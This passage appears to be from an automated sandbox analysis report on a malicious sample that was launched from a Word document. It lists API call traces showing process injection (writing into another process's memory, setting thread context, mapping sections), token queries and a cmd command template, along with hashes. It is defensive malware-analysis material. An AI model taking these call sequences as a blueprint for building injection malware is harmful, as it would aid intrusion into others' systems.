    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,?), ref: 001C9ECD
    • Part of subcall function 001C9D54: HeapFree.KERNEL32(00000000,00000000), ref: 001C9EE2
    • Part of subcall function 001C9BEF: RtlAllocateHeap.NTDLL(00000000,00000001), ref: 001C9C4A
    • Part of subcall function 001C9BEF: RtlReAllocateHeap.NTDLL(00000000,00000000,8B50F445,?), ref: 001C9C75
    • Part of subcall function 001C9BEF: memcpy.NTDLL(00000000,00000000,00000000,?,?,?,?,?,001CAB3A,?,001E5048,00000000), ref: 001C9C94
    • Part of subcall function 001C9BEF: HeapFree.KERNEL32(00000000,00000000), ref: 001C9CF5
    • Part of subcall function 001C9BEF: memcpy.NTDLL(?,00000000,001E5048,00000000,?,?,8B50F445,001CAB3A,?,?,?,?,?,001CAB3A,?,001E5048), ref: 001C9D17
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: mbstowcs
  • String ID: account{*}.oeaccount
  • API String ID: 103190477-4234512180
  • Opcode ID: db38bb75a22634db53e9cc12e14f7a3a7814f34f28c55422107802faa02d70e8
  • Instruction ID: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
  • Opcode Fuzzy Hash: 04D0C2234D14D5E3451392E458237BAF0225E0166298CA7B46631052D68D0035B2BF5E
  • Instruction Fuzzy Hash: c8baf39070d1460d9a28c3ce9be428947897f744562b5d35beaf4fd6a3701f22
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • mbstowcs.NTDLL ref: 001D7252
  • mbstowcs.NTDLL ref: 001D7278
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 58
  • API ID: HeapFreeRtlAllocateHeap
  • String ID: cmd /C "%s> %s1"
  • API String ID: 3817218409-3818503316
  • Opcode ID: 7cb6bc4750e7a2b71a7c8ec6f15424ada8eacba88be2c54c7f9c11c1ab560649
  • Instruction ID: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
  • Opcode Fuzzy Hash: B7E086B50124838B2027B466502AFB5F7463C511E054C261AFA625925B3A4231A6376C
  • Instruction Fuzzy Hash: 588946781791b301c5a342414b59db365c2d608245899175c87d025d3c5de5b8
APIs
  • RtlAllocateHeap.NTDLL(00000000,00000020), ref: 001C7804
    • Part of subcall function 001C7422: memset.NTDLL ref: 001C743A
    • Part of subcall function 001C7422: lstrlenW.KERNEL32(00000000,00000000,00000000,001EAD10,00000000,cmd /C "%s> %s1"), ref: 001C7473
    • Part of subcall function 001C7422: wcstombs.NTDLL ref: 001C747D
    • Part of subcall function 001C7422: CreateProcessA.KERNEL32(00000000,001C7831,00000000,00000000,00000000,0C000000,00000000,?,00000044,?), ref: 001C74B1
    • Part of subcall function 001C7422: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C74D2
    • Part of subcall function 001C7422: GetExitCodeProcess.KERNEL32(?,?), ref: 001C74EF
    • Part of subcall function 001C7422: GetLastError.KERNEL32 ref: 001C7507
  • HeapFree.KERNEL32(00000000,?,00000000), ref: 001C7868
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: StrToIntExmemcpy
  • String ID: 0x
  • API String ID: 149130431-3225541890
  • Opcode ID: da5bbc278911b085aa6d66a47a0cf6d216f6515775abb5fb592028d0f4abd24f
  • Instruction ID: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
  • Opcode Fuzzy Hash: B3D0A750AA2F8381152564850252B35F667F8A2B537CC9F525E00D716A2F52B7762F0B
  • Instruction Fuzzy Hash: c2cd423d91d0df5df5462c3e3052e101b859bd8a4f9e4db87d64d5530074a4df
APIs
  • memcpy.NTDLL(?,?,?), ref: 001C7E65
  • StrToIntExA.SHLWAPI(00007830,00000001,00000000), ref: 001C7E77
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: GetModuleHandleTlsAlloc
  • String ID: CHROME.DLL
  • API String ID: 618583884-1627437769
  • Opcode ID: ffb7a85a2e9683169558a98c7eabd5e151ffe081303fc3c2192e4f2d4ebb372b
  • Instruction ID: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
  • Opcode Fuzzy Hash: 9FC02BBC6446841A644631D45E6B2BC8C01E2D23D7D5D2B36EA3730C873F270DEBCA62
  • Instruction Fuzzy Hash: 172b9abf8796ec461fdea82e115e2a42355586ee831bb3e2f00eb90edb8df06a
APIs
  • GetModuleHandleA.KERNEL32(001EC065,00000000,001CB4C4,00000000,00000000,?,001CD6FE,?,?,?,?,?,001CDB1F,?), ref: 001C6247
  • TlsAlloc.KERNEL32(?,001CD6FE,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001C6253
    • Part of subcall function 001C6112: RtlImageNtHeader.NTDLL(001CD6FE), ref: 001C6127
    • Part of subcall function 001C6112: VirtualAlloc.KERNEL32(00000000,01000000,00003000,00000040,?,?,00000001,001CD6FE,?,00000001,00000000,?,001CD6FE), ref: 001C61ED
    • Part of subcall function 001CB2DA: HeapFree.KERNEL32(00000000,001CD6FE,00000000), ref: 001CB341
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 79
  • API ID: CloseHandleGetLastErrorHeapFreememset
  • String ID:
  • API String ID: 1419005916-0
  • Opcode ID: 760449bbfbed289788199d7c06102e71ba99187f66d499b3f37ec5349a85ff82
  • Instruction ID: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
  • Opcode Fuzzy Hash: 4C1189C5015BD382E6772E01A8A0F60D2429F86B76E4EA731C4BF745DE3D802024B776
  • Instruction Fuzzy Hash: b48012bcd23b1c670ab121ab113a12c2be84c226dba6163ca56302e6d7a217ce
APIs
    • Part of subcall function 001C24B7: lstrlen.KERNEL32(001C2246,?,00000000,00000000,001C2B9B,00000000,001C2246,?,00000000,?), ref: 001C24C1
    • Part of subcall function 001C24B7: RtlAllocateHeap.NTDLL(00000000,00000002), ref: 001C24D6
    • Part of subcall function 001C24B7: HeapFree.KERNEL32(00000000,00000000,001C71E8), ref: 001C251D
  • memset.NTDLL ref: 001C2BCA
    • Part of subcall function 001C7341: GetTickCount.KERNEL32(00000000,00000000,00000000,?,001C2BDE,00000000), ref: 001C7351
    • Part of subcall function 001C7341: CreateFileW.KERNEL32(001C2BDE,80000000,00000003,001EB0D8,00000003,00000000,00000000), ref: 001C736E
    • Part of subcall function 001C7341: GetFileSize.KERNEL32(001C2BDE,00000000,Local\,00000001,?,001C2BDE,00000000), ref: 001C739A
    • Part of subcall function 001C7341: CreateFileMappingA.KERNEL32(001C2BDE,001EB0D8,00000002,00000000,00000000,001C2BDE), ref: 001C73AE
    • Part of subcall function 001C7341: lstrlen.KERNEL32(001C2BDE,?,001C2BDE,00000000), ref: 001C73CA
    • Part of subcall function 001C7341: lstrcpy.KERNEL32(?,001C2BDE), ref: 001C73DA
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C73E2
    • Part of subcall function 001C7341: HeapFree.KERNEL32(00000000,001C2BDE), ref: 001C73F5
    • Part of subcall function 001C7341: CloseHandle.KERNEL32(001C2BDE), ref: 001C7407
    • Part of subcall function 001C7341: GetLastError.KERNEL32(?,001C2BDE,00000000), ref: 001C740F
  • CloseHandle.KERNEL32(?), ref: 001C2C13
    • Part of subcall function 001C2A39: RtlImageNtHeader.NTDLL(00000094), ref: 001C2A5A
    • Part of subcall function 001C2A39: CloseHandle.KERNEL32(001EAF58), ref: 001C2AA0
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2B43
    • Part of subcall function 001C2A39: HeapFree.KERNEL32(00000000,00000000,.dll), ref: 001C2B52
    • Part of subcall function 001C164D: RtlImageNtHeader.NTDLL(?), ref: 001C165E
    • Part of subcall function 001C164D: RtlAllocateHeap.NTDLL(00000000,00000011), ref: 001C1685
    • Part of subcall function 001C164D: GetTickCount.KERNEL32 ref: 001C169C
    • Part of subcall function 001C164D: wsprintfA.USER32 ref: 001C16AC
    • Part of subcall function 001C164D: RegCreateKeyA.ADVAPI32(80000001,001EC2F4,?), ref: 001C16E0
    • Part of subcall function 001C164D: StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 001C16F8
    • Part of subcall function 001C164D: lstrlen.KERNEL32(00000000), ref: 001C1702
    • Part of subcall function 001C164D: RegCloseKey.ADVAPI32(?), ref: 001C171E
    • Part of subcall function 001C164D: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C172C
    • Part of subcall function 001C1A08: RtlImageNtHeader.NTDLL ref: 001C1A48
    • Part of subcall function 001C1A08: GetCurrentThreadId.KERNEL32 ref: 001C1A5E
    • Part of subcall function 001C1A08: GetCurrentThread.KERNEL32 ref: 001C1A6F
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,?,00000000), ref: 001C1AE3
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000020,00000000), ref: 001C1AF3
    • Part of subcall function 001C1A08: RtlAllocateHeap.NTDLL(00000000,00000400), ref: 001C1B3F
    • Part of subcall function 001C1A08: wsprintfA.USER32 ref: 001C1B50
    • Part of subcall function 001C1A08: lstrlen.KERNEL32(00000000,00000000), ref: 001C1B5B
    • Part of subcall function 001C1A08: HeapFree.KERNEL32(00000000,00000000,0000010D), ref: 001C1B75
    • Part of subcall function 001C154D: RtlAdjustPrivilege.NTDLL(00000013,00000001,00000000,?), ref: 001C155B
    • Part of subcall function 001C154D: GetLastError.KERNEL32(?,001C2CD4), ref: 001C1572
    • Part of subcall function 001C1586: RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 001C159D
    • Part of subcall function 001C1586: GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,001C2CDE,00000094,00000000), ref: 001C15AF
    • Part of subcall function 001C1586: StrChrA.SHLWAPI(00000000,0000003A), ref: 001C15BC
    • Part of subcall function 001C1586: wsprintfA.USER32 ref: 001C15D0
    • Part of subcall function 001C1586: CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000), ref: 001C15E6
    • Part of subcall function 001C1586: GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 001C15FF
    • Part of subcall function 001C1586: WriteFile.KERNEL32(00000000,00000000), ref: 001C1607
    • Part of subcall function 001C1586: GetLastError.KERNEL32 ref: 001C1615
    • Part of subcall function 001C1586: CloseHandle.KERNEL32(00000000), ref: 001C161E
    • Part of subcall function 001C1586: GetLastError.KERNEL32(?,00000000,?,001C2CDE,00000094,00000000), ref: 001C162F
    • Part of subcall function 001C1586: HeapFree.KERNEL32(00000000,00000000), ref: 001C163F
    • Part of subcall function 001CB83A: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,001C14F5,?,00000000,00000000,00000000,00000006), ref: 001CB858
    • Part of subcall function 001CB83A: wsprintfA.USER32 ref: 001CB876
    • Part of subcall function 001CB8EF: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 001CB919
    • Part of subcall function 001CB8EF: HeapFree.KERNEL32(00000000,00000000), ref: 001CB968
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C2DC7
    • Part of subcall function 001C1E86: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1E92
    • Part of subcall function 001C1E86: RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 001C1EAD
    • Part of subcall function 001C1E86: lstrcpy.KERNEL32(00000000,001EC508), ref: 001C1ECE
    • Part of subcall function 001C1E86: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C1EEF
    • Part of subcall function 001C1EFC: InterlockedExchange.KERNEL32(001EAF50,00000000), ref: 001C1F04
    • Part of subcall function 001C2416: lstrlen.KERNEL32(?,00000000,00000000,00000001,?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000), ref: 001C242D
    • Part of subcall function 001C2416: RtlAllocateHeap.NTDLL(00000000,00000009,00000000), ref: 001C2440
    • Part of subcall function 001C2416: lstrcpy.KERNEL32(00000008,?), ref: 001C2462
    • Part of subcall function 001C2416: CreateThread.KERNEL32(00000000,00000000,001C23CD,00000000,00000000,00000000), ref: 001C247A
    • Part of subcall function 001C2416: CloseHandle.KERNEL32(00000000), ref: 001C2485
    • Part of subcall function 001C2416: GetLastError.KERNEL32(?,?,?,001C27D1,001C1F61,00000000,00000000,?,?,?,001C4A87,00000000,001EC202,00000000,00000000,00000000), ref: 001C248D
    • Part of subcall function 001C2416: HeapFree.KERNEL32(00000000,00000000), ref: 001C249E
  • GetLastError.KERNEL32(?,00000000,?), ref: 001C3013
    • Part of subcall function 001C1473: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C14AA
    • Part of subcall function 001C1473: wsprintfA.USER32 ref: 001C14CD
    • Part of subcall function 001C1473: HeapFree.KERNEL32(00000000,00000000,?), ref: 001C14FE
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 409
  • API ID: GetLastError$memcpymemset
  • String ID:
  • API String ID: 1724464136-0
  • Opcode ID: f4522468b970ccd3281ff04b4b9d6df2f9b0077f1de15eaad5e61c015f0d6d70
  • Instruction ID: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
  • Opcode Fuzzy Hash: 2401C052096E60C8F032AD0A54AA77BF147FF917F6D0DFB0064C23028B4E81A1E61FC9
  • Instruction Fuzzy Hash: e37c6a94cb606ac4b5cdd41d5bca87039fc062105047502b5dacc88aea22dfa5
APIs
  • memset.NTDLL ref: 001D87FD
  • memcpy.NTDLL ref: 001D8825
    • Part of subcall function 001D9142: RtlNtStatusToDosError.NTDLL(00000000), ref: 001D917A
    • Part of subcall function 001D9142: SetLastError.KERNEL32(00000000), ref: 001D9181
  • GetLastError.KERNEL32(00000010,00000218,001E3E3D,00000100,?,00000318,00000008), ref: 001D883C
    • Part of subcall function 001D9101: RtlNtStatusToDosError.NTDLL(C0000002), ref: 001D912E
    • Part of subcall function 001D9101: SetLastError.KERNEL32(00000000,?,001D8A05,00083097,00000000,00000000,00000318,00000010,?,00010003,00083097,?,00000318,00000008), ref: 001D9135
  • GetLastError.KERNEL32(00000010,?,00000000,00000318,?,?,?,?,?,?,?,?,00000010,00000218,001E3E3D,00000100), ref: 001D891F
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 113
  • API ID: lstrcpy$lstrlenmemcpy
  • String ID:
  • API String ID: 2435105219-0
  • Opcode ID: 389011caf0b95c7600b8c5e44240e3f54a572d070d9ef14607482dffdfcb44a1
  • Instruction ID: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
  • Opcode Fuzzy Hash: 19E06834C20EC8A2C527204C1072F45A784999153B9CDA3E7647629AD54E023016720F
  • Instruction Fuzzy Hash: 057d24042520a57a0e5aed1e1d06042fb0e2f3cc49f43699b05170c3c29814c7
APIs
  • lstrlen.KERNEL32(00000000,00000008,00000000,?,00000000,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE305
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,001DE901,00000000,00000000,00000004,00000000,?), ref: 001DE363
  • lstrcpy.KERNEL32(00000000,00000008), ref: 001DE373
  • lstrcpy.KERNEL32(00000000,00000000), ref: 001DE37F
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false

General

Root Process Name: d3d8sext.exe
Process MD5: AD7B9C14083B52BC532FBA5948342B98
Total matches: 134
Initial Analysis Report: Open
Initial sample Analysis ID: 51932
Initial sample SHA 256: 059A6DDEEA6D6CEC2B3380F022785CF66E0FC5B40B9CAEB3E6B6032AB9B998B2
Initial sample name: HBControls_Request.doc

Similar Executed Functions

Similarity
  • Total matches: 36
  • API ID: CreateEventGetLastErrorRtlAddVectoredExceptionHandlerRtlRemoveVectoredExceptionHandlerStrRChr_struprlstrlen
  • String ID:
  • API String ID: 1244505096-0
  • Opcode ID: e7bdade24c4945e58ca902ffe0c9ca2f3df43dc30c200f231c9832c7f3637fe3
  • Instruction ID: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
  • Opcode Fuzzy Hash: 0AF099380984018E452FA8A8581471E4B0CB4827DB68C7F17FDE81006E5F4FF0E05FA9
  • Instruction Fuzzy Hash: ef95ed1bddc589421013bfcb856b04b0bcbc63f25441288993c26348eebcf79a
APIs
  • StrRChrA.SHLWAPI(001EB090,00000000,0000005C), ref: 001CDA47
  • _strupr.NTDLL ref: 001CDA5D
  • lstrlen.KERNEL32(001EB090,?,001EC638), ref: 001CDA65
    • Part of subcall function 001D99D2: NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
    • Part of subcall function 001D99D2: NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001D99D2: NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
    • Part of subcall function 001D99D2: memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001D99D2: NtClose.NTDLL(001EC638), ref: 001D9A84
    • Part of subcall function 001D99D2: NtClose.NTDLL(?), ref: 001D9A8E
  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,001EC638), ref: 001CDAE5
  • RtlAddVectoredExceptionHandler.NTDLL(00000000,001CD036), ref: 001CDB0C
    • Part of subcall function 001CD519: memset.NTDLL ref: 001CD561
    • Part of subcall function 001CD519: CreateMutexA.KERNEL32(00000000,00000001,00000000,0000005C,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD59C
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD5A7
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(001EB020), ref: 001CD5BF
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CD617
    • Part of subcall function 001CD519: NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 001CD65C
    • Part of subcall function 001CD519: OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD671
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD67B
    • Part of subcall function 001CD519: CloseHandle.KERNEL32(00000000), ref: 001CD689
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000018), ref: 001CD716
    • Part of subcall function 001CD519: GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CD79E
    • Part of subcall function 001CD519: LoadLibraryA.KERNEL32(001EC000), ref: 001CD7A9
    • Part of subcall function 001CD519: RtlAllocateHeap.NTDLL(00000000,00000071), ref: 001CD821
    • Part of subcall function 001CD519: wsprintfA.USER32 ref: 001CD849
  • GetLastError.KERNEL32(?,?,?,001EC638), ref: 001CDB26
  • RtlRemoveVectoredExceptionHandler.NTDLL(001EB024), ref: 001CDB3C
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 84
  • API ID: NtCloseNtQueryInformationToken$NtOpenProcessNtOpenProcessTokenmemcpy
  • String ID:
  • API String ID: 1776017925-0
  • Opcode ID: 14313892d018c28c1512d211c24bd9508d3a727c070e1f2f8c81eb1ee10ca15e
  • Instruction ID: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
  • Opcode Fuzzy Hash: 65E061A35807C6FB51DA20701C03DE6D691FE10790C4C5B26D4F82D1864E5574794B07
  • Instruction Fuzzy Hash: d6d79205b1a81900fe822fcb00be5f34a57e9c8b213d0824a4876257126feae9
APIs
  • NtOpenProcess.NTDLL(?,00000400,?,?), ref: 001D9A19
  • NtOpenProcessToken.NTDLL(?,00000008,001EC638), ref: 001D9A2C
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,00000000,?,00000000), ref: 001D9A48
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • NtQueryInformationToken.NTDLL(001EC638,00000001,00000000,?,?,?), ref: 001D9A65
  • memcpy.NTDLL(?,00000000,0000001C), ref: 001D9A72
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
  • NtClose.NTDLL(001EC638), ref: 001D9A84
  • NtClose.NTDLL(?), ref: 001D9A8E
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 233
  • API ID: GetLastErrorNtSetContextThreadRtlNtStatusToDosErrormemcpymemset
  • String ID:
  • API String ID: 405287775-0
  • Opcode ID: 57d5b69842fa9f20cc0ac7374aaf72f9f3e4042206c472131978e9752df15512
  • Instruction ID: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
  • Opcode Fuzzy Hash: 09F078400B9F90E6E812A68604A2F406692FF06E75E0EE32475F211B8A3F12311D8B06
  • Instruction Fuzzy Hash: 4ec32f28258a742104229ce406441de6b2fcb2541c1b40aba7a151e3666b4461
APIs
  • memset.NTDLL ref: 01B338A2
  • GetLastError.KERNEL32(?,00000318,00000008), ref: 01B33995
    • Part of subcall function 01B33E68: NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
    • Part of subcall function 01B33E68: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
    • Part of subcall function 01B33E68: SetLastError.KERNEL32(00000000), ref: 01B33EA7
    • Part of subcall function 01B33DC5: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33DDD
  • memcpy.NTDLL(00000218,01B34F92,00000100,?,00010003,?,?,00000318,00000008), ref: 01B3391D
    • Part of subcall function 01B33E27: NtWriteVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,01B36114,?,01B31A67,?,00000004,01B324C1,00000004,?), ref: 01B33E45
    • Part of subcall function 01B33E27: RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E54
    • Part of subcall function 01B33E27: SetLastError.KERNEL32(00000000,?,01B31A67,?,00000004,01B324C1,00000004,?,?,?,?,01B32370,00000000,01B324C1,CCCCFEEB,00000000), ref: 01B33E5B
  • NtSetContextThread.NTDLL(00000000,00010003,?,00000000,00000000,00000318,00000010,?,00010003,?,?,00000318,00000008), ref: 01B33974
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33977
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 297
  • API ID: NtCloseNtCreateSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 2756933261-0
  • Opcode ID: f060986f037786d6eff44f917c1f9cd1492eae5187663b5233982b63c154d879
  • Instruction ID: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
  • Opcode Fuzzy Hash: A6E0C00114CEC4E7E9F2B8060843B2BA0507FC0942E5D7BA173A88952F1F20B012070A
  • Instruction Fuzzy Hash: feadd46726f6e130a927c333ac7e294827c696146bf5848ecda8d52408aab794
APIs
  • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 01B327EA
  • memset.NTDLL ref: 01B3280F
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B3282B
  • NtClose.NTDLL(?), ref: 01B3283F
    • Part of subcall function 01B32750: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 01B3277D
    • Part of subcall function 01B32750: RtlNtStatusToDosError.NTDLL(00000000), ref: 01B32784
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 134
  • API ID: NtProtectVirtualMemory
  • String ID: z
  • API String ID: 1546459799-1657960367
  • Opcode ID: cf60b7cb83ce32be4ff946b1fad70a6d95e18f7d6e657a237c07f6ddb8ba3109
  • Instruction ID: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
  • Opcode Fuzzy Hash: C321CD43048F92C7E9BB64801117F962385FBA3C6AD88FB625EA0576571F0036079FAB
  • Instruction Fuzzy Hash: 345721b4f2240ab4777f5441ad9e92397ba16a7e32a8fb621f1d84c599d8be6e
APIs
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F11E1
  • NtProtectVirtualMemory.NTDLL(000000FF,?,?,00000004,?), ref: 001F124B
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665752385.001F1000.00000040.sdmp, Offset: 001F1000, based on PE: false
Similarity
  • Total matches: 229
  • API ID: NtAllocateVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3367774474-0
  • Opcode ID: 09b8888f5fea2438ba07c33a5d99fafd9b808ca60c6c542fde1a50af119b8c2c
  • Instruction ID: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
  • Opcode Fuzzy Hash: 42C012800D5D81E6957F54890169A165197BB91600C3D73363184AD5807FA032190F09
  • Instruction Fuzzy Hash: e51ca6432f7bc6597b8f598a7fc739d540f14ae035788901fc615611556d8d1a
APIs
  • NtAllocateVirtualMemory.NTDLL(01B338CA,00000000,00000000,01B338CA,00003000,00000040), ref: 01B33E99
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 01B33EA0
  • SetLastError.KERNEL32(00000000), ref: 01B33EA7
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 238
  • API ID: NtReadVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 3946382534-0
  • Opcode ID: 153371e7e4f27683f8f1e7324a073917f20e70acda51c493c57c8daf0af629c8
  • Instruction ID: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
  • Opcode Fuzzy Hash: 09C09BC7021DC54DD779698201B5C45C1C57EB177243C710D5054DD31D518931274E85
  • Instruction Fuzzy Hash: c995cc5ffd7b2437847975390dfb1f6b652844ee00b7fe6512dbf475f9a5d32f
APIs
  • NtReadVirtualMemory.NTDLL(?,00000004,01B324C1,01B324C1,00000000,00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084), ref: 01B33E04
  • RtlNtStatusToDosError.NTDLL(C0000002), ref: 01B33E13
  • SetLastError.KERNEL32(00000000,?,01B32351,00000000,01B324C1,01B324C1,00000004,?,00000000,00000000,01B36084,00000000), ref: 01B33E1A
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false
Similarity
  • Total matches: 236
  • API ID: NtWriteVirtualMemoryRtlNtStatusToDosErrorSetLastError
  • String ID:
  • API String ID: 1449157707-0
  • Opcode ID: 36b500c4af3d78682ecbfd6e0cb23a776f8586d0295add1c103b4d2a2a554bea
  • Instruction ID: 9242206aa97e53cc143c7c92eab7ec0769b98c393631d7d1de103d3eb305b176
  • Opcode Fuzzy Hash: 9EC09B87020DC54DD779694101B9C45C0C57FB177243C710D5058DD31D518931274F85
